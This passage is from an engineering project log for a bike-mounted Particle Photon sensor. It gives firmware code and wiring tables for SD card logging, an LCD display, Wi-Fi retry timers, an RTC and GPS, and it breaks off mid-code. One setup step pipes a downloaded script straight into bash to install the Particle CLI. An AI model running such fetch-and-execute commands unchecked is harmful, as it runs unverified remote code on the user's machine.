//------------------------------------------------------------------------------
// Setup SPI configuration.
#if SPI_CONFIGURATION == 0
// Primary SPI with DMA
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFat sd;
const uint8_t chipSelect = A2;
#elif SPI_CONFIGURATION == 1
// Secondary SPI with DMA
// SCK => D4, MISO => D3, MOSI => D2, SS => D1
SdFat sd(1);
const uint8_t chipSelect = D1;
#elif SPI_CONFIGURATION == 2
// Primary SPI with Arduino SPI library style byte I/O.
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFatLibSpi sd;
const uint8_t chipSelect = SS;
#elif SPI_CONFIGURATION == 3
// Software SPI. Use any digital pins.
// MISO => D5, MOSI => D6, SCK => D7, SS => D0
SdFatSoftSpi<D5, D6, D7> sd;
const uint8_t chipSelect = D0;
#endif // SPI_CONFIGURATION
//------------------------------------------------------------------------------
File myFile;
int lk=1;
void setup() {
Serial.begin(9600);
// Wait for USB Serial
while (!Serial) {
SysCall::yield();
}
Serial.println("Type any character to start");
while (Serial.read() <= 0) {
SysCall::yield();
}
// Initialize SdFat or print a detailed error message and halt
// Use half speed like the native library.
// Change to SPI_FULL_SPEED for more performance.
if (!sd.begin(chipSelect, SPI_HALF_SPEED)) {
sd.initErrorHalt();
}
}
void loop() {
// open the file for write at end like the "Native SD library"
if (!myFile.open("test.txt", O_RDWR | O_CREAT | O_AT_END)) {
sd.errorHalt("opening test.txt for write failed");
}
// if the file opened okay, write to it:
Serial.print("Printing Line:");
myFile.println(String(lk));
// close the file:
lk=lk+1;
myFile.close();
Serial.println(String(lk));
delay(1000);
// close the file:
//myFile.close();
}
```
The Git repository for the said lybrary can be found [here](https://github.com/greiman/SdFat-Particle)
Due to the success on the testing phase for the said lybrary, the eventual code was plugged into the main program for the Bike Waggle Project.
### Task 16 - Setting up the SD card Logger for the Bike Waggle Project
Iteration 4 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
#### Verision Date : 07/19/2018
Additions: This iteration looks at how the SD card can save data logs. A few lybraries were tried out. SDfat lybrary appeared to be the one most useful and the most reliable. The code is designed to print sensor information and headers each time the device is powered on. On each loop the sensor outputs will be printed out on a new line. These logs will be printed out on a text file named Lakithas_Photon.txt within a folder named Lakithas_Photon. The names of the directory and and the text file will be uniquely identified for each bike waggle. If the said directory and the said text file does not exist, the photon is formulated to create the said folder and the said file when the device is inititally turned on.
The credentials for the MPU9250 sensor was also added.
A Sample of the SD card log can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/SD_Card_Log.txt).
On iteration 5, The means in which the LCD Display is set up will be looked into.
The pins used under the SPI(1) interface is defined below.
| Photon | SPI Name | SD Reader |
| ------ | -------- | --------- |
| A2 | SS | CS |
| A3 | SCK | SCK |
| A4 | MISO | DO |
| A5 | MOSI | DI |
| 3V3 | | 3V |
| GND | | GND |
| | | CD |
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-4.ino)**
## July 20
### Task 17: Setting up the LCD Display for the Bike Waggle Project.
#### Task 17.1 - Research on the "LiquidCrystal_I2C_Spark" Lybrary
The initial tests done on the said lybrary turned out to be fruitful. The initial test code can be found below.
```
// This #include statement was automatically added by the Particle IDE.
#include <LiquidCrystal_I2C_Spark.h>
LiquidCrystal_I2C *lcd;
void startupLCD(){
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
// Give Device Data
lcd->setCursor(0 /*columns*/,0 /*rows*/);
lcd->print("Project Bike Waggle");
lcd->setCursor(0 /*columns*/,1 /*rows*/);
lcd->print("Version 1.0");
lcd->setCursor(0 /*columns*/,2 /*rows*/);
lcd->print("LAKITHAs Photon");
delay(1000) ;
lcd->clear();
for (int count=0;count<=19;count++)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=0;count<=19;count++)
{ lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
}
void OperationalLCD(){
lcd->clear();
lcd->setCursor(0 /*columns*/,0 /*rows*/);
lcd->print("Bike Waggle|"+ Time.format(Time.now(),"%H:%M:%S"));
lcd->setCursor(0 /*columns*/,1 /*rows*/);
lcd->print("PM1:2.342");
lcd->setCursor(0 /*columns*/,2 /*rows*/);
lcd->print("PM2.5:4.33");
lcd->setCursor(0 /*columns*/,3 /*rows*/);
lcd->print("PM10:10.340");
lcd->setCursor(11 /*columns*/,0 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,1 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,2 /*rows*/);
lcd->print("|");
lcd->setCursor(11 /*columns*/,3 /*rows*/);
lcd->print("|");
lcd->setCursor(12 /*columns*/,1 /*rows*/);
lcd->print("TM:29.42");
lcd->setCursor(12 /*columns*/,2 /*rows*/);
lcd->print("HM:50.33");
delay(1000);
}
void setup()
{
Serial.begin(9600);
// The address is typically 0x27. I2C Address: 0x3F
// https://www.sainsmart.com/new-sainsmart-iic-i2c-twi-1602-serial-lcd-module-display-for-arduino-uno-mega-r3.html
lcd = new LiquidCrystal_I2C(0x3F /*address*/, 20/*columns*/, 4/*rows*/);
lcd->init();
lcd->backlight();
lcd->clear();
startupLCD();
}
void loop()
{
OperationalLCD();
}
```
The Git repository for the said lybrary can be found [here](https://github.com/BulldogLowell/LiquidCrystal_I2C_Spark)
Due to the success on the testing phase for the said lybrary, the eventual code was plugged into the main program for the Bike Waggle Project.
#### Task 17.2 - Plugging in the LCD Display code for the Bike Waggle Project
Iteration 5 of the bike waggle code was completed. The summary of the said iteration is given below. These descriptions can also be found within the [bike waggle](https://github.com/waggle-sensor/summer2018/tree/master/bike_waggle) project folder.
#### Verision Date : 07/20/2018
Additions: On this iteration the LCD display is set up. The LiquidCrystal_I2C_Spark lybrary was utilised here. The photon was programmed to display a startup message as well as a live coverage of the sensor Outputs with a refresh interval matching the loop interval.
On iteration 6,The GPS and the RTC will be hooked up to the photon.
The pins used under the I2C interface is defined below.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN | VCC |
| GND | GND |
On this [link](https://docs.particle.io/reference/firmware/photon/#wire-i2c-) Particle.io advises to use pull up resisters when using the I2C interaface. As such **Two pull up resisters were connected between the D0 and 3V3 and between D1 and 3V3 respectively.
Some helpful inks are psted below.
- [Link 1](https://www.hackster.io/ingo-lohs/what-s-my-i2c-address-0a097e)
- [Link 2](https://community.particle.io/t/resolved-i2c-lcd-on-photon-core-struggle/23981)
**The Source Code can be found [here](https://github.com/waggle-sensor/summer2018/blob/master/bike_waggle/sensorgram/sensogram-main-5.ino)**
## July 23 -24
### Task 18 - Setting Up the Serial Port for Debugging the Particle Photon
The Serial Connectivity can be set up in one of 3 ways for the Photon.
- Through the particle CLI
- Using Screen
- Through the Arduino IDE
#### 18.1 Through the Particle CLI
- Installing Particl CLI
On the Linux command line type in ``` bash <( curl -sL https://particle.io/install-cli )```
- Reading Serial Commands
Once Particle CLI is installed, on the command line type ``` particle serial monitor```
#### 18.2 Using Screen
- Installing Screen
On the Linux command line type in ``` sudo apt-get install screen```
- Figuring out the USB Port
On the command line tyinterface type ```ls /dev/ttyACM*```Once the comand is ran, a list of USB inputs will display. Usually you will be presented with something like ```/dev/ttyACM0```.
- Open Screen
Copy the Device ID from the previos task and type in ```sudo screen [device ID]```
Your command shoul look like ```sudo screen /dev/ttyACM0```. You may need to type in the Super User Credintials.
The following [link](https://community.particle.io/t/serial-tutorial/26946) will give a description of other means of Serial Communication for the Particle Photon.
### Task 19: Managing the WI-FI Connectivity on the Photon
Working on the Particle photon, it was found out that the the Photon didnt initiate itself when there was no conncetivity. Due to the remote environments the Photon was to be used, this can cause a serious problem. As such the different modes of Photon cloud connectivity was looked up.
The Photon provided 3 system modes
- AUTOMATIC : By default the Photon will be in Automatic Mode. And the device will not start its base code without a connction to the cloud(Without Wi-Fi)
- SEMI_AUTOMATIC: Will not need Wi-Fi Connection unless the user initiates the Wi-Fi Connection. However it retains most feeatures from the Automatic Mode.
- MANUAL : The User has all control over most essential functions of the photon. Often risky since some essential features will not be ran unless called upon by the user.
A precise description of each mode can be found [here](https://docs.particle.io/reference/firmware/photon/#system-modes).
For the purpose of the Bike Waggle Project the SEMI AUTOMATIC Mode was implimented. In order to impliment the said mode the follwing code is considered to be patched within the main Code.
```
SYSTEM_MODE(SEMI_AUTOMATIC)
SYSTEM_THREAD(ENABLED)
const uint32_t msRetryDelay = 2*60000; // retry every 5min
const uint32_t msRetryTime = 30000; // stop trying after 30sec
bool retryRunning = false;
Timer retryTimer(msRetryDelay, retryConnect); // timer to retry connecting
Timer stopTimer(msRetryTime, stopConnect); // timer to stop a long running try
void retryConnect()
{
if (!Particle.connected()) // if not connected to cloud
{
Serial.println("reconnect");
stopTimer.start(); // set of the timout time
WiFi.on();
Particle.connect(); // start a reconnectino attempt
}
else // if already connected
{
Serial.println("connected");
retryTimer.stop(); // no further attempts required
retryRunning = false;
}
}
void stopConnect()
{
Serial.println("stopped");
if (!Particle.connected()) // if after retryTime no connection
WiFi.off(); // stop trying and swith off WiFi
stopTimer.stop();
}
void setup()
{
Serial.begin(115200);
// pinMode(D7, OUTPUT);
Particle.connect();
if (!waitFor(Particle.connected, msRetryTime))
WiFi.off(); // no luck, no need for WiFi
}
void loop()
{
// MAIN LOOP CODE
//digitalWrite(D7, !digitalRead(D7));
time_t time = Time.now();
Serial.println(Time.format(time, TIME_FORMAT_DEFAULT));
delay(10000);
// Recheck Wifi Functions
if (!retryRunning && !Particle.connected())
{ // if we have not already scheduled a retry and are not connected
Serial.println("schedule");
stopTimer.start(); // set timeout for auto-retry by system
retryRunning = true;
retryTimer.start(); // schedula a retry
}
delay(500);
}
```
The wifi connectivity is managed by two timers set on two function calls. The *retryConnect* Function initates the Wi-Fi Connectivity. The *retryTimer* calls up this function every 5 minutes when no Wi-Fi Connctivity is found. Everytime the *retryConnect* function is called up it will check for Wi-Fi for 30 seconds before innitation of the code in queue. This is controlled by the *stopTimer* via the call up function *stopConnect*.
The said times of each function implimentation is under the users control. On the final version of the bike waggle the retry timer will probably be set to 30 minutes or 1 hour.
This [link](https://community.particle.io/t/solved-make-photon-run-code-without-being-necessarily-connected-to-the-particle-cloud/25953) will emphasize on the inner workings of the code.
## July 25
### Task 20 - Setting Up the Real Time Clock
The follwing tasks are aimed towards building an on board RTC.
#### 20.1 Looking up the *RTCLybrary* in Particle Photon
The Bike Waggle photon uses the [PCF8523](https://www.adafruit.com/product/3295) as its RTC CLock. Luckily the *RTClybrary* has an example dedicated towards the ADAfruit device. The said code can be found [here](https://build.particle.io/libs/RTClibrary/1.2.1/tab/example/pcf8523.ino). Based off the given code a separate base code for the RTC functionality is written.
```
// Date and time functions using a DS1307 RTC connected via I2C and Wire lib
#include <Wire.h>
#include "RTClibrary.h"
RTC_PCF8523 rtc;
//char daysOfTheWeek[7][12] = {"Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"};
// Initializing the Serial
void Initialize_Serial(){
while (!Serial) {
delay(1);
}
Serial.begin(57600);
}
void Initialize_RTC(){
if (! rtc.begin()) {
Serial.println("Couldn't find RTC");
while (1);
}
if (! rtc.initialized()) {
Serial.println("RTC is NOT running!");
}
}
void Update_RTC(){
// Update the RTC
if (Particle.connected()){
rtc.adjust(DateTime(Time.year(), Time.month(), Time.day(), Time.hour(), Time.minute(), Time.second()));
}
}
void Display_Date_Time(){
DateTime now = rtc.now();
Serial.print(now.year(), DEC);
Serial.print('/');
Serial.print(now.month(), DEC);
Serial.print('/');
Serial.print(now.day(), DEC);
Serial.print("-");
//Serial.print(daysOfTheWeek[now.dayOfTheWeek()]);
//Serial.print(") ");
Serial.print(now.hour(), DEC);
Serial.print(':');
Serial.print(now.minute(), DEC);
Serial.print(':');
Serial.print(now.second(), DEC);
Serial.println();
}
void setup () {
Initialize_Serial();
Initialize_RTC();
// Everytime the Particle is Turned on the RTC is Updated
Update_RTC();
}
void loop () {
Display_Date_Time();
delay(5000);
}
```
The code given initally updates the RTC via the Particle cloud. And oneach loop it reads off the current time via the onbaord RTC. As such the device will work even without WIFI Connectivity.
Since the RTC works works off an I<sup>2</sup>C interface, it utilizes the D0 and the D1 pins of the Photon.
| Photon | LCD |
| ------ | --------- |
| DO | SDA |
| D1 | SCL |
| VIN/3V3 | VCC |
| GND | GND |
## July 26-27
### Task 21 - Lookback at the SD card Logger
On the particle photon a string variable can only hold maximum string length of 622 bytes. If Wi-Fi connectivity is out for a considerable amount of time, the string variable keeping the data may run out of space. As such it was decided that the back logged data should be saved within the SD Card.
However this brought up a couple of serios problems. The *SDFat* library or any other lybrary used for SD Card Data loggin in the Photon did not allow manipulation of written data within SD Card text files. As such it was mearly impossible to save all backlogged data within one text files(No way of Deleting Published Data). The only possibilty was to save each sensogram packet in different textfiles defined with respect to an index which reflects the time of creation.
This inturn demaneded two other txt files to keep the last published index of sensogram packet as well as the last index backlogged within the SD card.
Each time backlogged data is being published to the cloud the text file which held the sensogram packet will be deleted. Inturn, the index file having the last pulished sensgram packets will be updated.
The base code for the SDCard check is as follows.
```
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
// This #include statement was automatically added by the Particle IDE.
#include <SdFat.h>
#include "SdFat.h"
// Pick an SPI configuration.
// See SPI configuration section below (comments are for photon).
#define SPI_CONFIGURATION 0
//------------------------------------------------------------------------------
// Setup SPI configuration.
#if SPI_CONFIGURATION == 0
// Primary SPI with DMA
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFat sd;
const uint8_t chipSelect = A2;
#elif SPI_CONFIGURATION == 1
// Secondary SPI with DMA
// SCK => D4, MISO => D3, MOSI => D2, SS => D1
SdFat sd(1);
const uint8_t chipSelect = D1;
#elif SPI_CONFIGURATION == 2
// Primary SPI with Arduino SPI library style byte I/O.
// SCK => A3, MISO => A4, MOSI => A5, SS => A2 (default)
SdFatLibSpi sd;
const uint8_t chipSelect = SS;
#elif SPI_CONFIGURATION == 3
// Software SPI. Use any digital pins.
// MISO => D5, MOSI => D6, SCK => D7, SS => D0
SdFatSoftSpi<D5, D6, D7> sd;
const uint8_t chipSelect = D0;
#endif // SPI_CONFIGURATION
//------------------------------------------------------------------------------
File myFile;
File myFile2;
size_t n;
int lk=1;
int num_of_logs=0;
String Next_Publish_Index ;
void Initialize_Serial(){
Serial.begin(9600);
// Wait for USB Serial
while (!Serial) {
SysCall::yield();
}
}
void Initialize_SD(){
// Use half speed like the native library.
// Change to SPI_FULL_SPEED for more performance.
if (!sd.begin(chipSelect, SPI_HALF_SPEED)) {
sd.initErrorHalt();
}
}
void Initialize_Backlogger(){
// Create a file in Folder1 using a path.
if (!sd.mkdir("Backlogs")) {
Serial.println("Backlogs not created");
}
if (!myFile.open("Backlogs/Index_File.txt", O_CREAT | O_WRITE | O_AT_END)) {
Serial.println("File Opening Failed");
}else{
// if the file opened okay, write to it:
Serial.println("Index_Created");
myFile.println("1");
myFile.close();
}
}
void Create_Initial_Logger_Files(){
// Create a file in Folder1 using a path.
for (int e = 1; e < 10; e++) {
Create_Text_Files("Backlogs/Backlog_Num_"+String(e)+".txt", "Sensogram_"+String(e));
delay(1000);
}
}
void Create_Text_Files(String Text_Name,String Text_Data){
// Create a file in Folder1 using a path.
if (!myFile.open(Text_Name, O_CREAT | O_WRITE | O_AT_END)) {
Serial.println("File Creation Failed");
}else{
// if the file opened okay, write to it:
Serial.println("File Created, Putting Text");
myFile.println(Text_Data);
myFile.close();
}
}
String Backlog_Read(String File_Index){
// re-open the file for reading:
String Read_Data ;
//Particle.publish("Index begining",File_Index.replace("\r",""));
Particle.publish("BR",File_Index);
Particle.publish("br2","Backlogs/Backlog_Num_"+ File_Index +".txt");
if (!myFile.open("Backlogs/Backlog_Num_"+ File_Index +".txt", O_READ)) {
sd.errorHalt("opening test.txt for read failed");
Read_Data = "# No Data Available";
}else{
Particle.publish("br3","Reading_Data_Log_inback log");
Read_Data = myFile.readStringUntil('\n');
myFile.close();
Particle.publish("BR4",Read_Data);
}
return Read_Data;
}
void Sensogram_Publisher()
{
// Read index from the Index File
if(!myFile.open("Backlogs/Index_File.txt", O_READ))
{
sd.errorHalt("opening test.txt for read failed");
}else
{
Serial.println("Reading_Index in");
Next_Publish_Index = (myFile.readStringUntil('\n')).replace("\r","");
myFile.close();
Serial.println(Next_Publish_Index);
String Sen = Backlog_Read(String(Next_Publish_Index));
Particle.publish("Index",Next_Publish_Index);
delay(2000);
Particle.publish("Sensorgram",Sen);
//Serial.println(Sen);
// Getting the Data
if(Particle.publish("Lakitha",Sen))
{
//Deleting Text File
// Remove files from current directory.
if (sd.remove("Backlogs/Index_File.txt") && sd.remove("Backlogs/Backlog_Num_"+ Next_Publish_Index +".txt"))
{
Serial.println("Files Removed, Recretaing Index");
//Recreating Index
if (!myFile.open("Backlogs/Index_File.txt", O_CREAT | O_WRITE | O_AT_END))
{
Serial.println("File Opening Failed");
}else{
// if the file opened okay, write to it:
Serial.println("Index_Created");
myFile.println(String(Next_Publish_Index.toInt()+1));
myFile.close();
}
}
}
}
}
void setup() {
// delay(1000);
// // Initialise Serail Communication
Initialize_Serial();
delay(10000);
Initialize_SD();
// delay(1000);
// Initialize_Backlogger();
// delay(5000);
// Create_Initial_Logger_Files();
// // Read Logger Files
//Backlog_Read("5");
delay(1000);
Sensogram_Publisher();
//Index_Updater();
}
void loop() {
}
```
Make sure to add anoter text file to save the #of created sensogram packets.
**This method maybe too aggressive on the battery. The Bike Waggle may need to be switched off with care due to this addition**
## July 30-31
### Task 22 - Setting up the GPS
Setting up the GPS was somewhat troublesome since debugging is usually done indoors. The GPS had to be taken out to check if the code was properly functional.As such a module was written to utilize the LCD togeather with the GPS. The folloinng code demostrates that.
```
// This #include statement was automatically added by the Particle IDE.
#include <Particle-GPS.h>
// This #include statement was automatically added by the Particle IDE.
#include <LiquidCrystal_I2C_Spark.h>
#include "Particle-GPS.h"
SYSTEM_MODE(SEMI_AUTOMATIC)
SYSTEM_THREAD(ENABLED)
const uint32_t msRetryDelay = 2*60000; // retry every 5min
const uint32_t msRetryTime = 30000; // stop trying after 30sec
bool retryRunning = false;
Timer retryTimer(msRetryDelay, retryConnect); // timer to retry connecting
Timer stopTimer(msRetryTime, stopConnect); // timer to stop a long running try
// ***
// *** Create a Gps instance. The RX an TX pins are connected to
// *** the TX and RX pins on the electron (Serial1).
// ***
Gps _gps = Gps(&Serial1);
LiquidCrystal_I2C *lcd;
// ***
// *** Create a timer that fires every 1 ms to capture
// *** incoming serial port data from the GPS.
// ***
Timer _timer = Timer(1, onSerialData);
void retryConnect()
{
if (!Particle.connected()) // if not connected to cloud
{
Serial.println("reconnect");
stopTimer.start(); // set of the timout time
WiFi.on();
Particle.connect(); // start a reconnectino attempt
}
else // if already connected
{
Serial.println("connected");
retryTimer.stop(); // no further attempts required
retryRunning = false;
}
}
void stopConnect()
{
Serial.println("stopped");
if (!Particle.connected()) // if after retryTime no connection
WiFi.off(); // stop trying and swith off WiFi
stopTimer.stop();
}
void startupLCD(){
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
for (int count=0;count<=19;count++)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3/*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=0;count<=19;count++)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
for (int count=19;count>=0;count--)
{
lcd->setCursor(count /*columns*/,0 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,1 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,2 /*rows*/);
lcd->print("#");
lcd->setCursor(count /*columns*/,3 /*rows*/);
lcd->print("#");
delay(40);
lcd->clear();
}
lcd->setCursor(5 /*columns*/,1 /*rows*/);
lcd->print("BIKE");
delay(1000) ;
lcd->setCursor(8 /*columns*/,2 /*rows*/);
lcd->print("WAGGLE");
delay(1000) ;
lcd->clear();
// Give Device Data
lcd->setCursor(0 /*columns*/,0 /*rows*/);
lcd->print("Project Bike Waggle");
lcd->setCursor(0 /*columns*/,1 /*rows*/);
lcd->print("Version 1.0");
lcd->setCursor(0 /*columns*/,2 /*rows*/);
lcd->print("Initializing");
lcd->setCursor(3 /*columns*/,3 /*rows*/);
lcd->print("Lakithas Photon");
delay(1000) ;
lcd->clear();
}
void OperationalLCD(){
Gga gga = Gga(_gps);
gga.parse();
Serial.println("2) Global Positioning System Fixed Data ($GPGGA)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(gga.utcTime);
Serial.print("Latitude: "); Serial.println(gga.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(gga.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(gga.longitude);
Serial.print("East/WestIndicator: "); Serial.println(gga.eastWestIndicator);
Serial.print("Position Fix Indicator: "); Serial.println(gga.positionFixIndicator);
Serial.print("Satellites Used: "); Serial.println(gga.satellitesUsed);
Serial.print("Horizontal Dilution of Precision: "); Serial.println(gga.hdop);
Serial.print("Altitude: "); Serial.print(gga.altitude); Serial.print(" "); Serial.println(gga.altitudeUnit);
Serial.print("Geoidal Separation: "); Serial.print(gga.geoidalSeparation); Serial.print(" "); Serial.println(gga.geoidalSeparationUnit);
Serial.print("Age of Diff. Corr.: "); Serial.println(gga.ageOfDiffCorr);
Serial.println("");
// ***
// *** Get the Recommended Minimum Navigation Information ($GPRMC).
// ***
Rmc rmc = Rmc(_gps);
rmc.parse();
Serial.println("1) Recommended Minimum Navigation Information ($GPRMC)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(rmc.utcTime);
Serial.print("Latitude: "); Serial.println(rmc.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(rmc.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(rmc.longitude);
Serial.print("East/WestIndicator: "); Serial.println(rmc.eastWestIndicator);
Serial.print("Speed Over Ground: "); Serial.println(rmc.speedOverGround);
Serial.print("Course Over Ground: "); Serial.println(rmc.courseOverGround);
Serial.print("Date: "); Serial.println(rmc.date);
Serial.print("Magnetic Variation: "); Serial.print(rmc.magneticVariation); Serial.print(" "); Serial.println(rmc.magneticVariationDirection);
Serial.print("Mode: "); Serial.println(rmc.mode);
Serial.println("");
delay(1000);
String Latitude = String(rmc.latitude);
String Longitude = String(rmc.longitude);
String Altitude = String(gga.altitude) ;
String Speed = String(rmc.speedOverGround);
lcd->clear();
lcd->setCursor(0 /*columns*/,0/*rows*/);
lcd->print("Lat: "+Latitude);
lcd->setCursor(0 /*columns*/,1/*rows*/);
lcd->print("Lon: "+Longitude);
lcd->setCursor(0 /*columns*/,2/*rows*/);
lcd->print("Alt: "+Altitude);
lcd->setCursor(0 /*columns*/,3/*rows*/);
lcd->print("Spd: "+Speed);
delay(1000);
}
void Initialize_LCD(){
// The address is typically 0x27. I2C Address: 0x3F
// https://www.sainsmart.com/new-sainsmart-iic-i2c-twi-1602-serial-lcd-module-display-for-arduino-uno-mega-r3.html
lcd = new LiquidCrystal_I2C(0x3F /*address*/, 20/*columns*/, 4/*rows*/);
lcd->init();
lcd->backlight();
lcd->clear();
startupLCD();
}
void setup()
{
delay(2000);
// ***
// *** Initialize the USB Serial for debugging.
// ***
Serial.begin();
Initialize_LCD();
Serial.println("Initializing...");
// ***
// *** Initialize the GPS.
// ***
_gps.begin(9600);
// ***
// *** Start the timer.
// ***
_timer.start();
lcd->clear();
lcd->setCursor(2 /*columns*/,1/*rows*/);
lcd->print("GPS Inititited");
}
void onSerialData()
{
_gps.onSerialData();
}
void loop()
{
Serial.print("Data[0] = "); Serial.println(_gps.data[0]);
Serial.print("Data[1] = "); Serial.println(_gps.data[1]);
Serial.print("Data[2] = "); Serial.println(_gps.data[2]);
Serial.print("Data[3] = "); Serial.println(_gps.data[3]);
Serial.print("Data[4] = "); Serial.println(_gps.data[4]);
Serial.print("Data[5] = "); Serial.println(_gps.data[5]);
Serial.print("Data[6] = "); Serial.println(_gps.data[6]);
Gga gga = Gga(_gps);
gga.parse();
Serial.println("2) Global Positioning System Fixed Data ($GPGGA)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(gga.utcTime);
Serial.print("Latitude: "); Serial.println(gga.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(gga.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(gga.longitude);
Serial.print("East/WestIndicator: "); Serial.println(gga.eastWestIndicator);
Serial.print("Position Fix Indicator: "); Serial.println(gga.positionFixIndicator);
Serial.print("Satellites Used: "); Serial.println(gga.satellitesUsed);
Serial.print("Horizontal Dilution of Precision: "); Serial.println(gga.hdop);
Serial.print("Altitude: "); Serial.print(gga.altitude); Serial.print(" "); Serial.println(gga.altitudeUnit);
Serial.print("Geoidal Separation: "); Serial.print(gga.geoidalSeparation); Serial.print(" "); Serial.println(gga.geoidalSeparationUnit);
Serial.print("Age of Diff. Corr.: "); Serial.println(gga.ageOfDiffCorr);
Serial.println("");
// ***
// *** Get the Recommended Minimum Navigation Information ($GPRMC).
// ***
Rmc rmc = Rmc(_gps);
rmc.parse();
Serial.println("1) Recommended Minimum Navigation Information ($GPRMC)");
Serial.println("======================================================");
Serial.print("UTC Time: "); Serial.println(rmc.utcTime);
Serial.print("Latitude: "); Serial.println(rmc.latitude);
Serial.print("North/SouthIndicator: "); Serial.println(rmc.northSouthIndicator);
Serial.print("Longitude: "); Serial.println(rmc.longitude);
Serial.print("East/WestIndicator: "); Serial.println(rmc.eastWestIndicator);
Serial.print("Speed Over Ground: "); Serial.println(rmc.speedOverGround);
Serial.print("Course Over Ground: "); Serial.println(rmc.courseOverGround);
Serial.print("Date: "); Serial.println(rmc.date);
Serial.print("Magnetic Variation: "); Serial.print(rmc.magneticVariation); Serial.print(" "); Serial.println(rmc.magneticVariationDirection);
Serial.print("Mode: "); Serial.println(rmc.mode);
Serial.println("");
OperationalLCD();
// Recheck Wifi Functions
if (!retryRunning && !Particle.connected())
{ // if we have not already scheduled a retry and are not connected
Serial.println("schedule");
stopTimer.start(); // set timeout for auto-retry by system
retryRunning = true;
retryTimer.start(); // schedula a retry
}
delay(2500);
}
```
The given code prints out the Speed, Longtitude, Attitude and the Altitude of the device. The pin DIagram for the device is given below.
| Photon | GPS |
|--------|-----|
| 3.3V | VCC |
| GND | GND |
| TX | RX |
| RX | TX |
## Aug 1-3
### Task 23 - Setting up the Gyroscope
For the gyroscope the follwing code was used to read data.
```
#include "quaternionFilters.h"
#include "MPU9250.h"
#define AHRS true // Set to false for basic data read
#define SerialDebug true // Set to true to get Serial output for debugging
MPU9250 myIMU;
void Initialize_Gyro(){
// Read the WHO_AM_I register, this is a good test of communication
byte c = myIMU.readByte(MPU9250_ADDRESS, WHO_AM_I_MPU9250);
if (c == 0x73) // WHO_AM_I should always be 0x68
{
Serial.print("Check 3");
Serial.println("MPU9250 is online...");
// Start by performing self test and reporting values
myIMU.MPU9250SelfTest(myIMU.SelfTest);
